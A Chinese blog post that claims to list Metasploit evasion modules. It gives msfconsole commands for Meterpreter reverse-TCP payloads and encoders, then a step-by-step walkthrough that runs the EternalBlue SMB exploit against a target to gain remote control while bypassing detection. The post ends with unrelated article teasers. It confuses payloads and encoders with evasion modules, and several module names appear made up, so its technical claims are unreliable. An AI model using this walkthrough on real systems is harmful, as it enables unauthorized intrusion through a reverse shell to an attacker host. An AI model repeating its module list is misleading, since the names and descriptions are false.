metasploit/modules/evasion 有哪些模块,以及具体使用案例

news/2024/12/26 18:47:33/

Metasploit框架的evasion模块用于生成绕过安全检测的有效载荷。以下是一些常见的evasion模块及其使用案例:

1. 通用Evasion模块

  • windows/meterpreter/reverse_tcp_rc4:使用RC4加密的反向TCP Meterpreter会话。

    set PAYLOAD windows/meterpreter/reverse_tcp_rc4
    set LHOST 192.168.1.2
    set LPORT 4444
    
  • windows/meterpreter/reverse_tcp_uuid:使用UUID生成器的反向TCP Meterpreter会话。

    set PAYLOAD windows/meterpreter/reverse_tcp_uuid
    set LHOST 192.168.1.2
    set LPORT 4444
    

2. 编码和混淆Evasion模块

  • x86/shikata_ga_nai:使用Shikata Ga Nai算法进行XOR编码。

    set ENCODER x86/shikata_ga_nai
    
  • x86/countdown:使用递减计数器进行编码。

    set ENCODER x86/countdown
    

3. 特定平台Evasion模块

  • windows/x64/meterpreter/reverse_tcp_stomp:使用STOMP协议的反向TCP Meterpreter会话。

    set PAYLOAD windows/x64/meterpreter/reverse_tcp_stomp
    set LHOST 192.168.1.2
    set LPORT 4444
    
  • linux/x86/meterpreter/reverse_tcp_lzma:使用LZMA压缩的反向TCP Meterpreter会话。

    set PAYLOAD linux/x86/meterpreter/reverse_tcp_lzma
    set LHOST 192.168.1.2
    set LPORT 4444
    

使用案例

假设你想利用一个Windows漏洞来获取远程控制,并且希望绕过安全检测,你可以按照以下步骤操作:

  1. 选择合适的exploit模块

    use exploit/windows/smb/ms17_010_eternalblue
    
  2. 设置目标IP

    set RHOSTS 192.168.1.1
    
  3. 选择合适的payload模块

    set PAYLOAD windows/meterpreter/reverse_tcp_rc4
    
  4. 设置本地监听地址和端口

    set LHOST 192.168.1.2
    set LPORT 4444
    
  5. 运行模块

    run
    

注意事项

  • 使用这些模块时,请确保你有合法的权限和目的。
  • 避免在未经授权的系统上进行测试,以免违反法律或政策。

通过这些模块和案例,你可以生成绕过安全检测的有效载荷,从而提高渗透测试的成功率。


http://www.ppmy.cn/news/1543762.html

相关文章

[QUIC] Packets 和 Frames 概述

Packets 和 Frames 概述 受保护的数据包 (Protected Packets) 基于不同的包类型, QUIC 使用不同等级的保护机制. Version Negotoation 包不受保护. Retry 包使用 AEAD 进行保护。 Initial 包使用 AEAD 进行保护, 但是使用的 Key 是由一个网络可见的值计算出来的。 因此 Ini…

无需手动部署的正式版comfyUI是否就此收费?开源等同免费?

​ ​ 关于ComfyUI的正式版是否会收费的问题是很多AI玩家都关心的问题。 一旦ComfyUI正式版发布,我们是否需要为它买单?不再开源 同时这也引出了一个核心问题:开源究竟等不等于免费? ComfyUI正式版到底是什么?它会收…

IO流--13--RandomAccessFile

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 RandomAccessFile1.简介2.RandomAccessFile的作用有哪些?3.RandomAccessFile类有两个构造器:3.常用API介绍 RandomAccessFile 案例环境搭建1…

计算机网络:网络层 —— IP数据报的发送和转发过程

文章目录 IP数据报的发送和转发过程主机发送IP数据报路由器转发IP数据报示例 IP数据报的发送和转发过程 IP 数据报的发送和转发过程包含以下两个过程: 主机发送IP数据报路由器转发IP数据报 直接交付:源主机与目的主机在同一网络中间接交付:…

奇瑞不客气智驾 晚不晚?

文/孔文清 一直很好奇: 尹同跃董事长的金句“智驾不客气”,应该怎么翻译成英语? 谷俊丽的演讲PPT给了我答案: All in Ai Cars ——全力以赴、全情投入智能化汽车。 谷俊丽是奇瑞全球创新大会上最兴奋的人之一,有一种闭…

Flink CDC系列之:学习理解核心概念——Data Sink

Flink CDC系列之:学习理解核心概念——Data Sink sink参数示例 sink 数据接收器用于应用架构更改并将更改数据写入外部系统。 数据接收器可以同时写入多个表。 参数 为了描述数据接收器,需要以下内容: 参数含义可选/必需typesink的类型&…

【计算机网络】零碎知识点(易忘 / 易错)总结回顾

一、计算机网络的发展背景 1、网络的定义 网络是指将多个计算机或设备通过通信线路、传输协议和网络设备连接起来,形成一个相互通信和共享资源的系统。 2、局域网 LAN 相对于广域网 WAN 而言,局域网 LAN 主要是指在相对较小的范围内的计算机互联网络 …

kali——tcpdump的使用

目录 前言 使用方法 监听指定网卡 将抓取的数据包保存到指定文件 读取数据包 前言 定义:tcpdump 是 Linux 系统下的一个强大的命令行式数据包嗅探工具,它能够实时捕获网络接口上的数据包,并将这些数据包的头部信息或完整内容显示出来或保…